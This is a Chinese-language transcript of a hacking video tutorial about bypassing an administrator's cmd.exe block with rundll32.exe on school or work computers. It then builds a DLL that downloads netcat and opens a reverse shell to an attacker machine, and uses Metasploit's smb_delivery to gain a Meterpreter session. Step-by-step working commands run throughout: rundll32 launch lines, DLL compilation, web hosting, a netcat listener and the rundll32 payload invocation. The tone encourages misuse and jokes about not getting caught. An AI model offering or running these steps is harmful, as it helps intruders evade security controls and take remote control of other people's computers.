一招秒杀电脑管理员cmd限制 | rundll32.exe

相关阅读

视频讲解

在这个充满惊喜的教程中，我们将揭示一个神秘技巧，让你轻松绕过CMD限制，打开被封锁的cmd命令提示符，重拾黑客的荣光！本视频将带你了解如何利用rundll32.exe，实现绕过以及执行dll，甚至如何进行反弹shell！更惊人的是，我们还将教你如何编写自己的动态链接库（dll），轻松实现反向连接！现在，就和我们一起，探索这个神秘世界，成为不可一世的黑客大师吧！让我们开始吧！

图文讲解

你登录到Windows电脑，也许它是学校的笔记本电脑，或者它属于你工作的公司。不管是什么情况，你首先要做的是启动命令提示符，这样你看起来就像Hackerloi先生一样酷。

但当你这样做时，你点击确定，它就会有一个弹出窗口。它显示如下，你的系统管理员已经阻止了这个程序。

那么在这种情况下，我们应该怎么做呢？当然，你要做的第一件事是去Loiliangyang YouTube频道，看看是否有这样一个视频，教你如何绕过这个。当然，你今天在这里，因为我将教你如何做到这一点。所以，首先，你有一台电脑。当然，在这种情况下，计算机可能是一台笔记本电脑。可能是台式机或任何情况。我们可以访问它。而我们现在要做的是能够启动cmd。当然，有一个问题，因为CMD现在被管理员封锁了。因此，我们必须想一想，好吧，我们还能启动什么，能够让我们运行所有这些不同类型的命令，类似于我们在cmd.exe中的那种。而在今天的教程中，我们将学习如何使用运行DLL32.exe，它可以让我们做到这一点。不仅如此，当你一直看下去的时候，我甚至会教你如何编写你自己的动态链接库(dll)，让我们可以运行执行代码，包括，比如说，下载一个文件，然后执行该文件，这样我们就可以从你的Kali Linux盒子里获得对整个电脑的远程控制权。

因为这个教程太酷了，你必须点赞，打开通知，否则你可能会被黑客攻击。所以在我们开始之前，请记住孩子们，黑客行为是非法的。如果你的黑客行为被发现，不要告诉他们你认识我。当然，最好的黑客是不会被抓住的。现在，回到电脑前，我们现在能做的就是回到运行中去。而我现在能做的是使用rundll32来帮助我们，比如说，启动一些例子，比如说，记事本。所以，例如，如果我输入rundll32，或者你可以看到这里已经有很多的例子。而我现在能做的是rundll32.exe shell32。在这种情况下，我可以瞄准，例如，notepad.exe。所以在这种情况下，这可能会让我们运行记事本。

所以一旦我点击了它，我就进去点击确定。好的。所以我们已经输入了

rundll32.exe shell32.dll,ShellExec_RunDLL notepad.exe

点击确定。砰，记事本出来了。

第二个例子在这里，rundll32.exe shell32。在这种情况下，我们正在做我们的目标cmd.exe。

rundll32.exe shell32.dll,ShellExec_RunDLL cmd.exe

点击确定。然后砰的一声。当然，我们这个项目被封锁了。

不用担心。同样地，我们也可以针对PowerShell。

rundll32.exe shell32.dll,ShellExec_RunDLL powershell

进入并点击确定。而就在这里，PowerShell对我们来说是可用的。

这里的另一个超级有趣的例子是建立我们自己的DLL32库，可以做更多具体的事情。所以在这种情况下，我这里有一个超级简单的例子，向我们展示了如何做到这一点。所以你可以看到在这里，我们有loiliangyang.com，我们打开Firefox，之后我们扔进参数，指向loiliangyang.com。

所以一旦这个DLL从rundll32.exe中被执行，它将打开Firefox，指向loiliangyang.com。现在超级酷。我们现在要做的就是继续把文件编译成.dll，点击回车。

x86_64-w64-mingw32-gcc -shared -o hackerloi2.dll hackerloi2.c

现在文件已经可用了。所以我们只需要把它直接放到/var/www里，之后再把它提供出来，让目标用户可以加载这个DLL。所以我现在要做的就是输入

sudo systemctl start apache2.service

而我现在要做的就是输入密码。之后，我所要做的就是进入并复制比方说 hackerloi2.dll到 /var/www/html/hackerloi2.dll，点击回车。

好吧，让我们使用sudo。嘭，完成。

sudo cp hackerloi2.dll /var/www/html/hackerloi2.dll

回到Windows电脑，我现在打开了Firefox，我现在要做的就是下载hackerloi2.dll，所以继续前进，点击回车。

让我们继续前进，把文件保存到桌面上，保存。我将继续前进并替换它。完成了。

而我现在要做的就是回到运行，

我们现在要做的就是指向新下载的DLL文件。所以你可以看到在这里我们已经有了rundll32.exe与C:/users/loiliangyang/desktop/hackerloi2.dll来运行Firefox。

所以一旦你准备好了，继续，点击OK，

然后，砰你现在可以看到，我们正在访问loyliangyang.com，

不要轻视这一步。这里我们正在下载一个叫netcat的文件，然后会给我们提供反弹shell。然后，当然，我们必须要有目标文件路径。而我们在这里做的是与Powershell.exe的参数。因此，我们所做的是我们执行这个文件并具备反向连接到黑客机器的能力。当然，在这种情况下，你是192.168.0.106其次是端口1234并且执行powershell.exe。

所以这给了我们进入目标计算机的远程控制。是的，我知道这绝对是美丽的。一旦你准备好了，就继续编译它。

sudo x86_64-w64-mingw32-gcc -shared -o hackerloi.dll hackerloi.c -lurlmon

一旦你完成了这个，我们现在要做的就是把文件复制过来。所以我现在要做的就是把 hackerloi.dll 拷贝到 /var/www/html并把它称为 hackerloi.dll。好的。

cp hackerloi.dll /var/www/html/hackerloi.dll

所以，一旦你完成了这些，我们现在能做的就是转移到目标计算机上。在这种情况下，我可以在这里做的是继续下载这个文件。好的。所以在这种情况下，我可以去，比如说，Firefox什么的，继续前进，输入192.168.0.106。好的。如果我/hackerloi.dll，在上面点击回车。

把它保存到桌面。

完成了。好的。而我们现在要做的就是进入运行。所以我们现在要做的是瞄准这个文件。所以我们去hackerloi.dll。

对。而从一开始，我们就在运行rundll32。

一直到最后，我们现在要做的是继续并突出显示我们在 DLL 中创建的一个函数。当然，在这种情况下，它将是下载文件(DownloadFile)。

稍等一下。我们还没有启动我们的监听器。所以我现在要做的就是输入nc以及-nlvp，然后是端口号1234按回车键就可以了。给我一点时间。好的。

nc -nlvp 1234

砰。所以我们在等待。我现在要做的就是回到Windows电脑中去。进入运行。我们现在要做的是，正如你在这里看到的，rundll32.exe，然后是hackerloi.dll的绝对路径，后面是下载文件，这就是功能。然后在三，二，一点击，确定。

我现在回过头来看Kali Linux，你可以看到就在这里，我们黑进去了。

游戏结束。

我知道这一切是超级复杂的，你可能想要的东西。这是一个更容易。所以你现在要做的就是去输入

sudo msfconsole

所以我们正在使用Metasploit来帮助我们创建DLL文件。而你要做的就是用户使用rundll32.exe对其进行执行。这就是了。完成了。

所以我们现在可以做的是继续输入

use exploit/windows/smb/smb_delivery

一旦我们有了这个，

我们现在要做的就是，比如，把SRVHOST设置为192.168.0.106。

set SRVHOST 192.168.0.106

所以这是你拥有的Kali Linux IP地址。一旦你准备好了，你现在要做的就是继续并输入exploit并且，砰，搞定。所以你可以看到在这里，我们甚至有指令，是为你提供的，你可以直接去运行它。好的。所以这是

rundll32.exe \\192.168.0.106\WRpV\test.dll,0

所有这些信息。只要在目标机上运行即可。好的。所以我又回到了目标机上。我在这里写了一条指令。而在三，二，一，点击确定。

我们看到有东西在加载。

如果我回到Kali Linux上，让我们看看我们在这里得到什么。Meterpreter会话打开。哦，这太棒了。所以让我们输入sessions。我们现在有一个会话正在运行。所以让我们去与之互动。

session -i 1

我可以输入shell进入。

这让我们可以直接进入电脑。所以这给了我们很大的权限来做我们想做的事。所以你可以看到这里的Windows\system32，我们黑进去了。游戏结束了。